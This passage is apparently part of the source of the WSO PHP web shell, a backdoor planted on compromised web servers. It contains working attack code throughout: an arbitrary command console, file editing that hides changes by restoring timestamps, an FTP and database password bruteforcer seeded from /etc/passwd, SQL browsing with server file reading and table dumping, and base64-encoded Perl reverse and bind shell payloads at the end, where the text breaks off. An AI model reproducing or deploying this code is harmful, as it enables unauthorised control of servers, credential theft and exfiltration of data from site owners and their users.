					echo htmlspecialchars(@fread($fp, 1024));
				@fclose($fp);
			}
			echo '
'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '
'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array(''), array(''),$code).'
'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can't set permissions!
'; } clearstatcache(); echo '
'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn't writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],"w"); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!
'; @touch($_POST['p1'],$time,$time); } } echo '
'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000
','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} $h[1] .= '
'; $h[2] .= "n"; } } echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can't rename!
'; else die(''); } echo '
'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '
'; break; } echo '
'; wsoFooter(); } function actionConsole() { if(!empty($_POST['p1']) && !empty($_POST['p2'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif(!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); echo "d.cf.cmd.value='';n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("n$ ".$_POST['p1']."n".wsoEx($_POST['p1']),"nrt\'")); if(preg_match("!.*cds+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='".$GLOBALS['cwd']."';"; } } echo "d.cf.output.value+='".$temp."';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo ""; echo '

Console

send using AJAX redirect stderr to stdout (2>&1)
$
'; echo '
'; wsoFooter(); } function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } function actionSelfRemove() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!(d+)s.*!', '', __FILE__))) die('Shell has been removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') wsoHeader(); echo '

Suicide

Really want to remove the shell?
Yes
'; wsoFooter(); } function actionBruteforce() { wsoHeader(); if( isset($_POST['proto']) ) { echo '

Results

Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).'
'; if( $_POST['proto'] == 'ftp' ) { function wsoBruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function wsoBruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function wsoBruteForce($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
'; } if(@$_POST['reverse']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo ''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).'
'; } } } echo "Attempts: $attempts Success: $success

"; } echo '

Bruteforce

' .'' .'' .'' .'' .'' .'' .'
Type
' .'' .'' .'' .'Server:port
Brute type
' .'' .'' .'
Login
Dictionary
' .'
'; echo '

'; wsoFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table wso2'); return array('file'=>implode("n",$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); $sql = $create[1].";n"; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $i = 0; $head = true; while($item = $this->fetch()) { $sql = ''; if($i % 1000 == 0) { $head = true; $sql = ";nn"; } $columns = array(); foreach($item as $k=>$v) { if($v === null) $item[$k] = "NULL"; elseif(is_int($v)) $item[$k] = $v; else $item[$k] = "'".@mysql_real_escape_string($v)."'"; $columns[] = "`".$k."`"; } if($head) { $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES nt(".implode(", ", $item).')'; $head = false; } else $sql .= "nt,(".implode(", ", $item).')'; if($fp) fwrite($fp, $sql); else echo($sql); $i++; } if(!$head) if($fp) fwrite($fp, ";nn"); else echo(";nn"); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "'".addslashes($v)."'"; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."n"; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if(@$_POST['p2']=='download') { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST['file'], 'w')) { foreach($_POST['tbl'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST['p2']); } else die(''); } wsoHeader(); echo "

Sql browser

TypeHostLoginPasswordDatabase
"; $tmp = ""; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo "'; } else echo $tmp; }else echo $tmp; echo " count the number of rows
"; if(isset($db) && $db->link){ echo "
"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo ""; } echo "
Tables:

"; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo " ".$value."" . (empty($_POST['sql_count'])?' ':" ({$n['n']})") . "
"; } echo "
File path:
"; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo "".$_POST['p2']." ({$num['n']} records) Page # "; echo " of $pages"; if($_POST['p3'] > 1) echo " < Prev"; if($_POST['p3'] < $pages) echo " Next >"; $_POST['p3']--; if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo "

"; } if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if($db->res !== false) { $title = false; echo ''; $line = 1; while($item = $db->fetch()) { if(!$title) { echo ''; foreach($item as $key => $value) echo ''; reset($item); $title=true; echo ''; $line = 2; } echo ''; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo ''; else echo ''; } echo ''; } echo '
'.$key.'
null'.nl2br(htmlspecialchars($value)).'
'; } else { echo '
Error: '.htmlspecialchars($db->error()).'
'; } } echo "

"; echo "

"; if($_POST['type']=='mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if($db->fetch()) echo "
Load file
"; } if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '
'.htmlspecialchars($file['file']).'
'; } } else { echo htmlspecialchars($db->error()); } echo '
'; wsoFooter(); } function actionNetwork() { wsoHeader(); $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTS